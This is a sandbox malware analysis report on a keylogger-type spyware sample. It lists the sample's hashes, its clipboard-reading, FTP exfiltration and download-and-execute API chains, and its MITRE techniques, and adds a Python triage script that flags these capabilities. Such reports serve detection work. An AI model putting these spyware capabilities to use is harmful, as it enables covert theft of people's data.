Analysis Report executable.4420.exe

Overview

General Information

Sample Name:executable.4420.exe
Analysis ID:356831
MD5:6192cfbe8e44360f7c0b6f696206f41d
SHA1:166886066ffabb76f6b72c4b4ed91fa19e59987a
SHA256:8e353600579959f0507d00376d2e56e8c9a24648b2574ee72fa81dec5d70874a

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Machine Learning detection for sample
Contains functionality to read data from the clipboard
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to upload files via FTP
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Startup

  • System is w10x64
  • executable.4420.exe (PID: 5412 cmdline: 'C:\Users\user\Desktop\executable.4420.exe' MD5: 6192CFBE8E44360F7C0B6F696206F41D)
    • WerFault.exe (PID: 2100 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 672 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: executable.4420.exe | Avira: detected
Multi AV Scanner detection for submitted file
Source: executable.4420.exe | ReversingLabs: Detection: 74%
Machine Learning detection for sample
Source: executable.4420.exe | Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: executable.4420.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_00428DCB memset,FindFirstFileA,FindClose,0_2_00428DCB
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_004251F0 __EH_prolog,#536,#924,#922,#924,#800,#800,#800,FindFirstFileA,#537,#537,#922,#923,#922,DeleteFileA,#800,#800,#800,#800,#800,FindNextFileA,FindClose,#800,0_2_004251F0
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_004255B0 __EH_prolog,#537,#924,#922,#800,#800,FindFirstFileA,sscanf,sscanf,sscanf,#551,#3337,#3337,#3337,#3337,#3337,#3337,#551,FindNextFileA,FindClose,#800,0_2_004255B0
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_004247C9 __EH_prolog,#537,#924,#922,#800,#800,#3811,FindFirstFileA,sscanf,sscanf,sscanf,#551,#536,#924,#922,#924,#800,#800,#800,DeleteFileA,#800,FindNextFileA,FindClose,#800,0_2_004247C9

Contains functionality to upload files via FTP
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_004258FF __EH_prolog,#3811,#924,#924,#924,#924,#924,#924,#858,#858,#858,#3790,#3790,#3790,#540,#924,#858,#800,#537,#537,#922,#923,#922,#537,#924,#800,#800,#800,#800,#800,#800,#800,#3790,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,lstrcpyA,lstrcpyA,lstrcpyA,InternetOpenA,InternetCloseHandle,InternetConnectA,FtpSetCurrentDirectoryA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,GetComputerNameA,#3337,#3337,#3337,#3337,#3337,#3337,sprintf,FtpCreateDirectoryA,lstrcatA,lstrlenA,lstrcatA,lstrcatA,FtpSetCurrentDirectoryA,InternetCloseHandle,InternetCloseHandle,FtpPutFileA,FtpPutFileA,FtpPutFileA,FtpPutFileA,FtpPutFileA,DeleteFileA,#924,DeleteFileA,#800,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,#537,#537,#922,#923,#922,DeleteFileA,#800,#800,#800,#800,#800,#537,#537,#922,#924,#922,DeleteFileA,#800,#800,#800,#800,#800,GetUserNameA,#924,FtpPutFileA,DeleteFileA,#537,#922,#923,#800,#800,FtpCreateDirectoryA,#537,#537,#923,#922,#923,#800,#800,#800,#800,#924,#941,#924,FtpPutFileA,#800,#924,DeleteFileA,#800,#924,#924,DeleteFileA,#800,#800,#800,#800,#800,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,#924,#800,#800,#800,#800,#800,#800,#800,#800,#800,#800,0_2_004258FF
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_0041B588 __EH_prolog,InternetGetConnectedState,#1199,GetDlgItem,EnableWindow,GetDlgItemTextA,GetDlgItemTextA,GetDlgItemTextA,GetDlgItemTextA,GetDlgItemTextA,GetDlgItemInt,lstrcpyA,IsDlgButtonChecked,InternetOpenA,#1199,GetDlgItem,EnableWindow,InternetCloseHandle,InternetConnectA,#1199,GetDlgItem,EnableWindow,FtpSetCurrentDirectoryA,lstrcpyA,FtpCreateDirectoryA,lstrlenA,lstrcatA,lstrcatA,FtpSetCurrentDirectoryA,#1199,GetDlgItem,EnableWindow,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,#924,CreateFileA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,WriteFile,CloseHandle,CloseHandle,FtpPutFileA,#1199,GetDlgItem,EnableWindow,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,DeleteFileA,GetDlgItem,EnableWindow,#1199,#800,#800,0_2_0041B588
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_004276F1 __EH_prolog,lstrcpyA,lstrcpyA,InternetOpenA,InternetCloseHandle,InternetConnectA,FtpSetCurrentDirectoryA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,GetComputerNameA,GetUserNameA,#3811,#537,#537,#924,#922,#922,#800,#800,#800,#800,#537,#537,#926,#922,FtpPutFileA,#800,#800,#800,#800,DeleteFileA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,#800,0_2_004276F1

Contains functionality to download and launch executables
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_0042221F __EH_prolog,#924,#537,#537,#922,URLDownloadToFileA,#800,#800,#800,memset,CreateFileA,ReadFile,CloseHandle,#800,CloseHandle,DeleteFileA,atoi,#1199,ShellExecuteA,#800,#800,0_2_0042221F

Source: executable.4420.exe | String found in binary or memory: http://www.blazingtools.com/
Source: executable.4420.exe | String found in binary or memory: http://www.blazingtools.com/downloads.html
Source: executable.4420.exe | String found in binary or memory: http://www.blazingtools.com/orderbpk.html_This
Source: executable.4420.exe | String found in binary or memory: http://www.blazingtools.com/update.tmpupdates/bpk.dat

Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_00428E0F IsWindow,IsWindowUnicode,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,lstrlenW,#823,WideCharToMultiByte,#860,#825,#860,GlobalUnlock,CloseClipboard,0_2_00428E0F

Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: String function: 0043E4E0 appears 241 times
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: String function: 0043DE26 appears 82 times

One or more processes crash
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 672

Sample file is different than original file name gathered from version info
Source: executable.4420.exe, 00000000.00000002.226322068.0000000000970000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameMFC42.DLL.MUIR vs executable.4420.exe

Source: classification engine | Classification label: mal60.winEXE@2/4@0/0
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_0041C947 GetLastError,FormatMessageA,MessageBoxA,LocalFree,0_2_0041C947
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_004288B3 CreateToolhelp32Snapshot,Module32First,Module32Next,memcpy,CloseHandle,0_2_004288B3
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_00429112 CoCreateInstance,0_2_00429112
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_0042980F #1168,FindResourceA,#1168,SizeofResource,LoadResource,LockResource,#537,#538,0_2_0042980F
Source: C:\Users\user\Desktop\executable.4420.exe | File created: C:\Users\user\AppData\Roaming\BPK\
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5412
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D2F.tmp
Source: executable.4420.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\executable.4420.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 entries)
Source: unknown | Process created: C:\Users\user\Desktop\executable.4420.exe 'C:\Users\user\Desktop\executable.4420.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 672

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_00428AD2 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00428AD2

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_0043E4E0 push eax; ret 0_2_0043E4FE
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_0043E690 push eax; ret 0_2_0043E6BE

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\WerFault.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\executable.4420.exe | Process information set: NOOPENFILEERRORBOX (3 entries)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (19 entries)

Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\executable.4420.exe | API coverage: 3.8 %

Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_0042AAFA GetSystemTime followed by cmp: cmp word ptr [ebp-10h], 0005h and CTI: jbe 0042AB3Fh 0_2_0042AAFA
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_0042AAFA GetSystemTime followed by cmp: cmp word ptr [ebp-0eh], 0014h and CTI: jbe 0042AB4Ch 0_2_0042AAFA

Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_0042AAFA CreateFileA,GetSystemTime,SystemTimeToFileTime,SetFileTime,CloseHandle,0_2_0042AAFA
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_00428A6B GetVersionExA,0_2_00428A6B

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_00410C1A strlen,memset,htons,inet_addr,gethostbyname,bind,memset,htons,inet_addr,gethostbyname,WSASetLastError,0_2_00410C1A
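The "Code function" entries above are the sandbox's static view of each routine's imported-API sequence, and read in order they describe behaviour directly: the routine at 0_2_004258FF calls GetComputerNameA, formats a name with sprintf, creates a remote directory with FtpCreateDirectoryA, uploads with FtpPutFileA and then deletes the local files, which is log exfiltration keyed by host name. Reading such chains by eye does not scale, so the following is an added example (not part of the Joe Sandbox report) that parses those lines and flags capability patterns. The pattern table is my own heuristic choice; the input lines are copied from the report, and the "#NNN" tokens are treated as MFC42 ordinal imports (the Rich header and the MFC42.DLL version string above show a VC++ 6 MFC build) and skipped.

```python
"""Triage the 'Code function' lines of a Joe Sandbox report: split each line into
the function address and its ordered API sequence, then flag capability patterns.
Added example, not part of the report; the CAPABILITIES table is a heuristic."""
import re

# Ordered API subsequences that, inside one function, indicate a capability.
CAPABILITIES = {
    "ftp_upload": ["InternetConnectA", "FtpPutFileA"],
    "host_identity_then_upload": ["GetComputerNameA", "GetUserNameA", "FtpPutFileA"],
    "download_and_execute": ["URLDownloadToFileA", "ShellExecuteA"],
    "dynamic_api_resolution": ["LoadLibraryA", "GetProcAddress"],
    "clipboard_read": ["OpenClipboard", "GetClipboardData"],
    "listening_socket": ["bind"],
}

# "<pid>_<stage>_<addr> api,api,...,<pid>_<stage>_<addr>" as printed by the report.
LINE_RE = re.compile(
    r"Code function:\s*(?P<addr>\d+_\d+_[0-9A-Fa-f]{8})\s+(?P<calls>.*?),(?P=addr)\s*$")

# Lines copied from the report above (one non-code line included to show it is skipped).
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_004276F1 __EH_prolog,lstrcpyA,lstrcpyA,InternetOpenA,InternetCloseHandle,InternetConnectA,FtpSetCurrentDirectoryA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,GetComputerNameA,GetUserNameA,#3811,#537,#537,#924,#922,#922,#800,#800,#800,#800,#537,#537,#926,#922,FtpPutFileA,#800,#800,#800,#800,DeleteFileA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,#800,0_2_004276F1",
    r"Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_0042221F __EH_prolog,#924,#537,#537,#922,URLDownloadToFileA,#800,#800,#800,memset,CreateFileA,ReadFile,CloseHandle,#800,CloseHandle,DeleteFileA,atoi,#1199,ShellExecuteA,#800,#800,0_2_0042221F",
    r"Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_00428AD2 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00428AD2",
    r"Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_00428E0F IsWindow,IsWindowUnicode,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,lstrlenW,#823,WideCharToMultiByte,#860,#825,#860,GlobalUnlock,CloseClipboard,0_2_00428E0F",
    r"Source: C:\Users\user\Desktop\executable.4420.exe | Code function: 0_2_00410C1A strlen,memset,htons,inet_addr,gethostbyname,bind,memset,htons,inet_addr,gethostbyname,WSASetLastError,0_2_00410C1A",
    r"Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 672",
]


def parse_code_function(line):
    """Return (address, [api, ...]) or None for lines that are not API chains.
    '#NNN' tokens are MFC42 ordinal imports and carry no capability signal, so drop them."""
    m = LINE_RE.search(line)
    if m is None:
        return None
    calls = [c.strip() for c in m.group("calls").split(",")]
    return m.group("addr"), [c for c in calls if c and not c.startswith("#")]


def contains_in_order(calls, pattern):
    """True if every API in pattern occurs in calls in that order (gaps allowed)."""
    it = iter(calls)
    return all(any(call == wanted for call in it) for wanted in pattern)


def triage(lines):
    """Map function address -> list of matched capability names, in table order."""
    findings = {}
    for line in lines:
        parsed = parse_code_function(line)
        if parsed is None:
            continue
        addr, calls = parsed
        hits = [name for name, pat in CAPABILITIES.items() if contains_in_order(calls, pat)]
        if hits:
            findings[addr] = hits
    return findings


if __name__ == "__main__":
    for addr, hits in triage(REPORT_LINES).items():
        print(addr, ", ".join(hits))
```

Matching on ordered subsequences rather than on the mere presence of an import is deliberate: a GUI tool that imports FtpPutFileA for a settings dialog (compare the routine at 0_2_0041B588, which wraps the same calls in GetDlgItemTextA and IsDlgButtonChecked) looks different from a routine that gathers the host and user name and then uploads, and the order is what separates the two.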

Mitre Att&ck Matrix

Techniques flagged for this sample, by tactic (the number after a technique is the report's match marker; only flagged techniques are listed):

Execution: Native API 1
Privilege Escalation: Process Injection 1
Defense Evasion: Process Injection 1; Masquerading 1; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 2
Discovery: System Time Discovery 11; Query Registry 1; Process Discovery 1; Account Discovery 1; System Owner/User Discovery 1; Remote System Discovery 1; File and Directory Discovery 1; System Information Discovery 3
Collection: Clipboard Data 2
Exfiltration: Exfiltration Over Alternative Protocol 1
Command and Control: Ingress Tool Transfer 11; Application Layer Protocol 1
Initial Access, Persistence, Credential Access, Lateral Movement, Network Effects, Remote Service Effects, Impact: no techniques flagged

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
executable.4420.exe | 74% | ReversingLabs | Win32.Spyware.Perfect
executable.4420.exe | 100% | Avira | HEUR/AGEN.1112545
executable.4420.exe | 100% | Joe Sandbox ML | -

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
0.2.executable.4420.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1112545
0.0.executable.4420.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1112545

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.blazingtools.com/update.tmpupdates/bpk.dat | 0% | Avira URL Cloud | safe
http://www.blazingtools.com/orderbpk.html_This | 0% | Avira URL Cloud | safe
http://www.blazingtools.com/downloads.html | 1% | Virustotal | -
http://www.blazingtools.com/downloads.html | 0% | Avira URL Cloud | safe
http://www.blazingtools.com/ | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.blazingtools.com/update.tmpupdates/bpk.dat | executable.4420.exe | false | Avira URL Cloud: safe | unknown
http://www.blazingtools.com/orderbpk.html_This | executable.4420.exe | false | Avira URL Cloud: safe | unknown
http://www.blazingtools.com/downloads.html | executable.4420.exe | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
http://www.blazingtools.com/ | executable.4420.exe | false | Avira URL Cloud: safe | unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:356831
Start date:23.02.2021
Start time:17:38:41
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 24s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:executable.4420.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:Run with higher sleep bypass
Number of new started processes analysed:34
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal60.winEXE@2/4@0/0
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 99.8% (good quality ratio 90.1%)
  • Quality average: 71.8%
  • Quality standard deviation: 31.1%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Sleeps bigger than 120000ms are automatically reduced to 1000ms
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
  • Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.42.151.234, 23.211.6.115, 104.43.193.48, 40.88.32.150, 52.255.188.83, 184.30.24.56, 51.11.168.160, 8.250.157.254, 8.248.95.254, 8.238.27.126, 8.241.80.126, 8.248.123.254, 20.54.26.129, 92.122.213.194, 92.122.213.247, 52.155.217.156
  • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_executable.4420._c4d235e04f7d67dd8b9808a243ef65182404b_dc10a768_08086b39\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):11694
Entropy (8bit):3.7672748277627535
Encrypted:false
SSDEEP:192:h/5h7gBgH/UJuLl+7jpLPAz/u7ssS274ItM/1c:tz/UJuLcjCz/u7ssX4It0c
MD5:7A55A9DC34D7C94401B8ED3160BA0C72
SHA1:F4AE306D576E833E6A99A8363306C07D9DD76A06
SHA-256:35E4069BB231E06A148487DCAC11D00BE8A891927E7CC072221A7056F001F51C
SHA-512:9B3C9B7EA90710D5C183686C7CB6977E33357DE869B25ED2D18182B7F94D65BE3CBD209640AE7837043826B243424205AF3939D4D7704BB80C276E5AF9D212E8
Malicious:false
Reputation:low
Preview (UTF-16LE, decoded): Version=1 / EventType=APPCRASH / EventTime=132586043764426110 / ReportType=2 / Consent=1 / UploadTime=132586043788332340 / ReportStatus=268435456 / ReportIdentifier=0d03d251-ec9b-44e9-a46d-7af5b09405ae / IntegratorReportIdentifier=bda6f5f1-d3f7-49ae-b2ef-b92109a6f957 / Wow64Host=34404 / Wow64Guest=332 / NsAppName=executable.4420.exe / AppSessionGuid=00001524-0001-0017-f71d-37e74d0ad701 / TargetAppId=W:000677be299c7994b95377cd62c15c1999190000ffff!0000166886066ffabb76f6b72c4b4ed91fa19e59987a!executable.4420.e
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D2F.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Wed Feb 24 01:39:36 2021, 0x1205a4 type
Category:dropped
Size (bytes):1080022
Entropy (8bit):1.2269964489942033
Encrypted:false
SSDEEP:3072:eS293HEp5CUPF0iJTiSQCidYakBWg+vSsThybQv:eS29X65CUPF0iJTiSQCidYakEg+v9Qbm
MD5:B9A9BEE69F8163C259E82977694A384E
SHA1:500E77B794EB34E6B0A50D43FA8D767CE220D611
SHA-256:EF357D66AA69B8ECAE3AA51BA7FF633B2C709DB23F74EEA1FC236F6C60018722
SHA-512:018C33E5506E918DF09B1F4859D22AB2D97D5D3A53F85A0736CD1BDADA2C64CDD87862BDBD7158FDF6749D7744CA220BF54C595B2521C6ECADECC955DB9CC61B
Malicious:false
Reputation:low
Preview: MDMP....... .......X.5`...................U...........B..............GenuineIntelW...........T.......$...U.5`.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WER655E.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8320
Entropy (8bit):3.693017369135634
Encrypted:false
SSDEEP:192:Rrl7r3GLNiUWV68nw6YSeSUh2sLgmfXlZS/LNCpDs89bXnisf79m:RrlsNiV68nw6YbSUh2ogmfLS/LsXnhfM
MD5:C9E60060870D3B974BE4AFC5F943DBB3
SHA1:66BFC2EE917214F25A0C603029918D30BCB8913F
SHA-256:918D1EE2E7E2C757290948589858F1515FAC4E694A7236A4D155E0CD1971CE61
SHA-512:AE855276116DCF22E25C23D3D800C4F974AC71C6A2C2AF10EEA556FC4D3F3F3D1413890BCD796B556B9A9DDEB0A5980F88DCEC3FB2C6AF56BAA568AFF42FEFCB
Malicious:false
Reputation:low
Preview (UTF-16LE, decoded): <?xml version="1.0" encoding="UTF-16"?><WERReportMetadata><OSVersionInformation><WindowsNTVersion>10.0</WindowsNTVersion><Build>17134</Build><Product>(0x30): Windows 10 Pro</Product><Edition>Professional</Edition><BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString><Revision>1</Revision><Flavor>Multiprocessor Free</Flavor><Architecture>X64</Architecture><LCID>1033</LCID></OSVersionInformation><ProcessInformation><Pid>5412</Pid>
C:\ProgramData\Microsoft\Windows\WER\Temp\WER65FB.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4597
Entropy (8bit):4.461112344435761
Encrypted:false
SSDEEP:48:cvIwSD8zsjtJgtWI9LrWSC8BT8fm8M4JSHd8lFb+q8r3Y70UHj+d:uITfjHYaSNyJS987q3+DHj+d
MD5:5D91C01CE7A87CC544F3B72FE1EB4DD3
SHA1:5E7E5241C6400239CB4406316B6AF0FE2FF95FF4
SHA-256:E6BA6B6FBB2687EBA4F1DEE10D64EE7B7AB566032F570DB75477951426E4CA36
SHA-512:99990EB14ED48B65E833CF3F67CE36E24912B5DBE627BE1AC8340D8BB7970D10593D05634FE7290EACE6311B042C2690EB720E197B5786DA8057BDDDD2E596F7
Malicious:false
Reputation:low
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="874730" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):3.300468788976393
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:executable.4420.exe
File size:438272
MD5:6192cfbe8e44360f7c0b6f696206f41d
SHA1:166886066ffabb76f6b72c4b4ed91fa19e59987a
SHA256:8e353600579959f0507d00376d2e56e8c9a24648b2574ee72fa81dec5d70874a
SHA512:d492b9ea094bd6e695a562a855587feaf793be0cb35cf28df681a0022a8e0139a222a68bd578fb65b125fe9fea86f1f596bf337e65a445e8a5286d95ae037857
SSDEEP:3072:U+NvJwwbI7mZgauugh+KsvkfGDLNj58E2wL6uEXKIwjwxhfgtRlh:9swbYmZgarrKsvVDR5POuE6Iwqf4
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u....R...R...R.].R...R.c.R...R.]>R...R.\.R...R.`.R...R\c.R...R.`.R...R.`.R...R.Y.R...R...R.}.R%\.R...R...R...R.Y.R...R.y.R...

File Icon

Icon Hash:00828e8e8686b000

Static PE Info

General

Entrypoint:0x43e7ae
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x47299316 [Thu Nov 1 08:49:26 2007 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:4dc9b0b4e019be52f23cc9a3c195910d

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0044A588h
push 0043E91Eh
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [00444824h]
pop ecx
or dword ptr [00455C18h], FFFFFFFFh
or dword ptr [00455C1Ch], FFFFFFFFh
call dword ptr [004447B4h]
mov ecx, dword ptr [00455BF8h]
mov dword ptr [eax], ecx
call dword ptr [00444754h]
mov ecx, dword ptr [00455BF4h]
